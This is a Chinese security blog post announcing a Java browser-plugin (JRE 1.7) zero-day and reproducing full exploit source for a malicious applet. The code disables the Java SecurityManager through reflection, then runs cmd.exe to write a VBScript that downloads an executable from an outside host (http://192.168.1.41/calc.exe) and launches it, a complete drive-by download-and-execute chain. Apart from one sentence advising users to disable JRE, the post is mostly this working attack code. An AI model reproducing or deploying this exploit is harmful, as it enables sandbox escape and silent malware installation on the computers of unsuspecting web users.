我喜欢黑夜,喜欢网络安全,孤独寂寞的黑夜里,我只需要,一包烟,一台笔记本...
更多
首  页>>JAVA安全开发>> 漏洞信息jre远程代码执行0day,可进行挂马攻击
jre远程代码执行0day,可进行挂马攻击
3425
0推荐
0评论

捕获到最新的Java 0day漏洞。该漏洞影响浏览器的JRE[1.7.x]插件,危害巨大;攻击者可利用该漏洞进行挂马攻击,进而控制网民用户的计算机。目前,该漏洞的利用代码已被公开,而官方尚未发布任何补丁;在补丁发布之前,我们建议用户卸载或禁用JRE。

package cve2012_java_0day;
 
import java.applet.Applet;
import java.awt.Graphics;
import java.beans.Expression;
import java.beans.Statement;
import java.lang.reflect.Field;
import java.net.URL;
import java.security.*;
import java.security.cert.Certificate;
 
public class Gondvv extends Applet
{
 
    public Gondvv()
    {
    }
 
    public void disableSecurity()
        throws Throwable
    {
        Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
        Permissions localPermissions = new Permissions();
        localPermissions.add(new AllPermission());
        ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
        AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
            localProtectionDomain
        });
        SetField(Statement.class, "acc", localStatement, localAccessControlContext);
        localStatement.execute();
    }
 
    private Class GetClass(String paramString)
        throws Throwable
    {
        Object arrayOfObject[] = new Object[1];
        arrayOfObject[0] = paramString;
        Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);
        localExpression.execute();
        return (Class)localExpression.getValue();
    }
 
    private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
        throws Throwable
    {
        Object arrayOfObject[] = new Object[2];
        arrayOfObject[0] = paramClass;
        arrayOfObject[1] = paramString;
        Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
        localExpression.execute();
        ((Field)localExpression.getValue()).set(paramObject1, paramObject2);
    }
 
    public void init()
    {
        try
        {
            disableSecurity();
            Process localProcess = null;
            String command="cmd.exe /c echo Const adTypeBinary = 1 > d:\apsou.vbs & echo Const adSaveCreateOverWrite = 2 >> d:\apsou.vbs & echo Dim BinaryStream >> d:\apsou.vbs & echo Set BinaryStream = CreateObject("ADODB.Stream") >> d:\apsou.vbs & echo BinaryStream.Type = adTypeBinary >> d:\apsou.vbs & echo BinaryStream.Open >> d:\apsou.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> d:\apsou.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> d:\apsou.vbs & echo Function BinaryGetURL(URL) >> d:\apsou.vbs & echo Dim Http >> d:\apsou.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> d:\apsou.vbs & echo Http.Open "GET", URL, False >> d:\apsou.vbs & echo Http.Send >> d:\apsou.vbs & echo BinaryGetURL = Http.ResponseBody >> d:\apsou.vbs & echo End Function >> d:\apsou.vbs & echo Set shell = CreateObject("WScript.Shell") >> d:\apsou.vbs & echo shell.Run "d:\update.exe" >> d:\apsou.vbs " +
            "& start d:\apsou.vbs http://192.168.1.41/calc.exe d:\windows\1.exe";      
            localProcess = Runtime.getRuntime().exec(command);
            //C:\Users\hp\workspace\cve2012_java_0day\src\cve2012_java_0day\calc.exe
            //calc.exe
            if(localProcess != null);
               localProcess.waitFor();
        }
        catch(Throwable localThrowable)
        {
            localThrowable.printStackTrace();
        }
    }
 
    public void paint(Graphics paramGraphics)
    {
        paramGraphics.drawString("Loading", 50, 25);
    }
}

已经有 ( 0 ) 位网友对此发表了自己的看法,你也评一评吧! 此文不错,我要推荐-->    推 荐
欢迎参与讨论,请在这里发表您的看法、交流您的观点@禁止各种脚本

  • 点击Top
  • 推荐Top
  • 评论Top
更 多>>
本站采用Java语言开发,Spring框架,欢迎朋友们提意见。重新对页面进行布局,修改了程序,方便开源使用,由于本人美工真的不行 ,很少用背景图片,页面基本都用背景色...
主题:无色无味 | 网站地图|
Copyright (c) 2012-2013 www.shack2.org All Rights Reserved. | 空ICP备111111111号 | 程序设计: shack2 Powered by SJBlog v1.0 联系QQ:1341413415